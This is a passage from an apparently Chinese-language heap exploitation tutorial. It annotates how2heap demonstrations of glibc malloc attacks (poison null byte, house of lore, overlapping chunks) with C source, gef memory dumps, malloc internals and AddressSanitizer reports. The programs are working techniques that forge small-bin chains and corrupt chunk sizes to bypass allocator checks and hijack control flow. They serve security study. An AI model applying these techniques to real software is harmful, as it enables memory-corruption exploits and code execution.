0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
这里有个很有趣的东西,分配堆块后,发生变化的是 fake c.prev_size,而不是 c.prev_size。所以 chunk c 依然认为 chunk b 的地方有一个大小为 0x110 的 free chunk。但其实这片内存已经被分配给了 chunk b1。
接下来是见证奇迹的时刻,我们知道,两个相邻的 small chunk 被释放后会被合并在一起。首先释放 chunk b1,伪造出 fake chunk b 是 free chunk 的样子。然后释放 chunk c,这时程序会发现 chunk c 的前一个 chunk 是一个 free chunk,然后就将它们合并在了一起,并从 unsorted bin 中取出来合并进了 top chunk。可怜的 chunk 2 位于 chunk b1 和 chunk c 之间,被直接无视了,现在 malloc 认为这整块区域都是未分配的,新的 top chunk 指针已经说明了一切。
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000020fe1 <-- top chunk
0x603030: 0x0000000000603100 0x00007ffff7dd1b78
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x4141414141414141 0x4141414141414141
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000090 0x0000000000000050 <-- chunk b2 <-- 'victim' chunk
0x6030c0: 0x4141414141414141 0x4141414141414141
0x6030d0: 0x4141414141414141 0x4141414141414141
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin
0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603120: 0x0000000000000020 0x0000000000000000
0x603130: 0x0000000000000110 0x0000000000000090
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
chunk 合并的过程如下,首先该 chunk 与前一个 chunk 合并,然后检查下一个 chunk 是否为 top chunk,如果不是,将合并后的 chunk 放回 unsorted bin 中,否则,合并进 top chunk:
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}
if (nextchunk != av->top) {
/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/
[...]
}
/*
If the chunk borders the current high end of memory,
consolidate into top
*/
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}
接下来,申请一块大空间,大到可以把 chunk b2 包含进来,这样 chunk b2 就完全被我们控制了。
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000121 <-- chunk d
0x603030: 0x4242424242424242 0x4242424242424242
0x603040: 0x4242424242424242 0x4242424242424242
0x603050: 0x4242424242424242 0x4242424242424242
0x603060: 0x4242424242424242 0x4242424242424242
0x603070: 0x4242424242424242 0x4242424242424242
0x603080: 0x4242424242424242 0x4242424242424242
0x603090: 0x4242424242424242 0x4242424242424242
0x6030a0: 0x4242424242424242 0x4242424242424242
0x6030b0: 0x4242424242424242 0x4242424242424242 <-- chunk b2 <-- 'victim' chunk
0x6030c0: 0x4242424242424242 0x4242424242424242
0x6030d0: 0x4242424242424242 0x4242424242424242
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 <-- small bins
0x603110: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 <-- fd, bk pointer
0x603120: 0x0000000000000020 0x0000000000000000
0x603130: 0x0000000000000110 0x0000000000000090
0x603140: 0x0000000000000000 0x0000000000020ec1 <-- top chunk
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
还有个事情值得注意,在分配 chunk d 时,由于在 unsorted bin 中没有找到适合的 chunk,malloc 就将 unsorted bin 中的 chunk 都整理回各自的 bins 中了,这里就是 small bins。
最后,继续看 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,把两种大小的 tcache bin 都占满。
heap-buffer-overflow,但不知道为什么,加了内存检测参数后,real size 只能是正常的 0x10 了。
$ gcc -fsanitize=address -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0x60200000eff0
'real' size of 'a': 0x10
b: 0x611000009f00
c: 0x60c00000bf80
=================================================================
==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990
READ of size 8 at 0x611000009ef8 thread T0
#0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22
#1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978)
0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000)
allocated by thread T0 here:
#0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15
#2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
house_of_lore
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
void jackpot(){ puts("Nice jump d00d"); exit(0); }
int main() {
intptr_t *victim = malloc(0x80);
memset(victim, 'A', 0x80);
void *p5 = malloc(0x10);
memset(p5, 'A', 0x10);
intptr_t *victim_chunk = victim - 2;
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[3] = {0};
stack_buffer_1[0] = 0;
stack_buffer_1[2] = victim_chunk;
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
free((void*)victim);
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
void *p2 = malloc(0x100);
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
victim[1] = (intptr_t)stack_buffer_1;
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
void *p3 = malloc(0x40);
char *p4 = malloc(0x80);
memset(p4, 'A', 0x10);
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
intptr_t sc = (intptr_t)jackpot;
memcpy((p4+40), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x1b2e010
stack_buffer_1: 0x7ffe5c570350
stack_buffer_2: 0x7ffe5c570330
Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin
victim->fd: 0x7f239d4c9b78
victim->bk: 0x7f239d4c9b78
Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0
The victim chunk 0x1b2e010 will be inserted in front of the SmallBin
victim->fd: 0x7f239d4c9bf8
victim->bk: 0x7f239d4c9bf8
Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360
The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8
Nice jump d00d
在前面的技术中,我们已经知道怎样去伪造一个 fake chunk,接下来,我们要尝试伪造一条 small bins 链。
首先创建两个 chunk,第一个是我们的 victim chunk,请确保它是一个 small chunk,第二个随意,只是为了确保在 free 时 victim chunk 不会被合并进 top chunk 里。然后,在栈上伪造两个 fake chunk,让 fake chunk 1 的 fd 指向 victim chunk,bk 指向 fake chunk 2;fake chunk 2 的 fd 指向 fake chunk 1,这样一个 small bin 链就差不多了:
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000000 0x0000000000000021 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1
0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
molloc 中对于 small bin 链表的检查是这样的:
[...]
else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
[...]
即检查 bin 中第二块的 bk 指针是否指向第一块,来发现对 small bins 的破坏。为了绕过这个检查,所以才需要同时伪造 bin 中的前 2 个 chunk。
接下来释放掉 victim chunk,它会被放到 unsoted bin 中,且 fd/bk 均指向 unsorted bin 的头部:
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed]
0x603010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603000, bk=0x603000
→ Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)
这时,申请一块大的 chunk,只需要大到让 malloc 在 unsorted bin 中找不到合适的就可以了。这样原本在 unsorted bin 中的 chunk,会被整理回各自的所属的 bins 中,这里就是 small bins:
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[8]: fw=0x603000, bk=0x603000
→ Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)
接下来是最关键的一步,假设存在一个漏洞,可以让我们修改 victim chunk 的 bk 指针。那么就修改 bk 让它指向我们在栈上布置的 fake small bin:
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed]
0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 <-- bk->fake chunk 1
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1
0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
我们知道 small bins 是先进后出的,节点的增加发生在链表头部,而删除发生在尾部。这时整条链是这样的:
HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> victim chunk <-> TAIL
fd: ->
bk: <-
fake chunk 2 的 bk 指向了一个未定义的地址,如果能通过内存泄露等手段,拿到 HEAD 的地址并填进去,整条链就闭合了。当然这里完全没有必要这么做。
接下来的第一个 malloc,会返回 victim chunk 的地址,如果 malloc 的大小正好等于 victim chunk 的大小,那么情况会简单一点。但是这里我们不这样做,malloc 一个小一点的地址,可以看到,malloc 从 small bin 里取出了末尾的 victim chunk,切了一块返回给 chunk p3,然后把剩下的部分放回到了 unsorted bin。同时 small bin 变成了这样:
HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> TAIL
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000051 <-- chunk p3
0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x0000000000000041 <-- unsorted bin
0x603060: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000040 0x0000000000000020 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1
0x7fffffffdc60: 0x00007ffff7dd1bf8 0x00007fffffffdc30 <-- fd->TAIL, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603050, bk=0x603050
→ Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE)
最后,再次 malloc 将返回 fake chunk 1 的地址,地址在栈上且我们能够控制。同时 small bin 变成这样:
HEAD(undefined) <-> fake chunk 2 <-> TAIL
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007ffff7dd1bf8 0x0000000000400aed <-- fd->TAIL
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- chunk 4
0x7fffffffdc60: 0x4141414141414141 0x4141414141414141
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
于是我们就成功地骗过了 malloc 在栈上分配了一个 chunk。
最后再想一下,其实最初的 victim chunk 使用 fast chunk 也是可以的,其释放后虽然是被加入到 fast bins 中,而不是 unsorted bin,但 malloc 之后,也会被整理到 small bins 里。自行尝试吧。
heap-use-after-free,所以上面我们用于修改 bk 指针的漏洞,应该就是一个 UAF 吧,当然溢出也是可以的:
$ gcc -fsanitize=address -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x60c00000bf80
stack_buffer_1: 0x7ffd1fbc5cd0
stack_buffer_2: 0x7ffd1fbc5c90
Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin
=================================================================
==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0
READ of size 8 at 0x60c00000bf80 thread T0
#0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27
#1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)
最后再给一个 libc-2.27 版本的:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
void jackpot(){ puts("Nice jump d00d"); exit(0); }
int main() {
intptr_t *victim = malloc(0x80);
// fill the tcache
int *a[10];
int i;
for (i = 0; i < 7; i++) {
a[i] = malloc(0x80);
}
for (i = 0; i < 7; i++) {
free(a[i]);
}
memset(victim, 'A', 0x80);
void *p5 = malloc(0x10);
memset(p5, 'A', 0x10);
intptr_t *victim_chunk = victim - 2;
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[6] = {0};
stack_buffer_1[0] = 0;
stack_buffer_1[2] = victim_chunk;
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin;
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
free((void*)victim);
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
void *p2 = malloc(0x100);
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
victim[1] = (intptr_t)stack_buffer_1;
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
void *p3 = malloc(0x40);
// empty the tcache
for (i = 0; i < 7; i++) {
a[i] = malloc(0x80);
}
char *p4 = malloc(0x80);
memset(p4, 'A', 0x10);
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
intptr_t sc = (intptr_t)jackpot;
memcpy((p4+0xa8), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x55674d75f260
stack_buffer_1: 0x7ffff71fb1d0
stack_buffer_2: 0x7ffff71fb1f0
Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin
victim->fd: 0x7f1eba392b00
victim->bk: 0x7f1eba392b00
Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700
The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin
victim->fd: 0x7f1eba392b80
victim->bk: 0x7f1eba392b80
Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0
The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0
Nice jump d00d
overlapping_chunks
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
int main() {
intptr_t *p1,*p2,*p3,*p4;
p1 = malloc(0x90 - 8);
p2 = malloc(0x90 - 8);
p3 = malloc(0x80 - 8);
memset(p1, 'A', 0x90 - 8);
memset(p2, 'A', 0x90 - 8);
memset(p3, 'A', 0x80 - 8);
fprintf(stderr, "Now we allocate 3 chunks on the heap\n");
fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3);
free(p2);
fprintf(stderr, "Freeing the chunk p2\n");
int evil_chunk_size = 0x111;
int evil_region_size = 0x110 - 8;
*(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2
fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n");
p4 = malloc(evil_region_size);
fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size);
fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80);
fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n");
memset(p4, 'B', 0xd0);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n");
memset(p3, 'C', 0x50);
fprintf(stderr, "p4 = %s\n", (char *)p4);
fprintf(stderr, "p3 = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks.c
$ ./a.out
Now we allocate 3 chunks on the heap
p1=0x1e2b010
p2=0x1e2b0a0
p3=0x1e2b130
Freeing the chunk p2
Emulating an overflow that can overwrite the size of the chunk p2.
p4: 0x1e2b0a0 ~ 0x1e2b8e0
p3: 0x1e2b130 ~ 0x1e2b530
If we memset(p4, 'B', 0xd0), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
If we memset(p3, 'C', 0x50), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
这个比较简单,就是堆块重叠的问题。通过一个溢出漏洞,改写 unsorted bin 中空闲堆块的 size,改变下一次 malloc 可以返回的堆块大小。
首先分配三个堆块,然后释放掉中间的一个:
gef➤ x/60gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x4141414141414141
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x0000000000000091 <-- chunk 2 [be freed]
0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x6020b0: 0x4141414141414141 0x4141414141414141
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x4141414141414141
0x602150: 0x4141414141414141 0x4141414141414141
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
→ Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE)
chunk 2 被放到了 unsorted bin 中,其 size 值为 0x90。
接下来,假设我们有一个溢出漏洞,可以改写 chunk 2 的 size 值,比如这里我们将其改为 0x111,也就是原本 chunk 2 和 chunk 3 的大小相加,最后一位是 1 表示 chunk 1 是在使用的,其实有没有都无所谓。
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
→ Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE)
这时 unsorted bin 中的数据也更改了。
接下来 malloc 一个大小的等于 chunk 2 和 chunk 3 之和的 chunk 4,这会将 chunk 2 和 chunk 3 都包含进来:
gef➤ x/60gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x4141414141414141
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x0000000000000111 <-- chunk 4
0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x6020b0: 0x4141414141414141 0x4141414141414141
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x0000000000000090 0x0000000000000080 <-- chunk 3
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x4141414141414141
0x602150: 0x4141414141414141 0x4141414141414141
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x0000000000020e61 <-- top chunk
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
这样,相当于 chunk 4 和 chunk 3 就重叠了,两个 chunk 可以互相修改对方的数据。就像上面的运行结果打印出来的那样。
overlapping_chunks_2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
int prev_in_use = 0x1;
p1 = malloc(0x10);
p2 = malloc(0x80);
p3 = malloc(0x80);
p4 = malloc(0x80);
p5 = malloc(0x10);
real_size_p1 = malloc_usable_size(p1);
real_size_p2 = malloc_usable_size(p2);
real_size_p3 = malloc_usable_size(p3);
real_size_p4 = malloc_usable_size(p4);
real_size_p5 = malloc_usable_size(p5);
memset(p1, 'A', real_size_p1);
memset(p2, 'A', real_size_p2);
memset(p3, 'A', real_size_p3);
memset(p4, 'A', real_size_p4);
memset(p5, 'A', real_size_p5);
fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n");
fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1));
fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2));
fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3));
fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4));
fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));
free(p4);
fprintf(stderr, "\nLet's free the chunk p4\n\n");
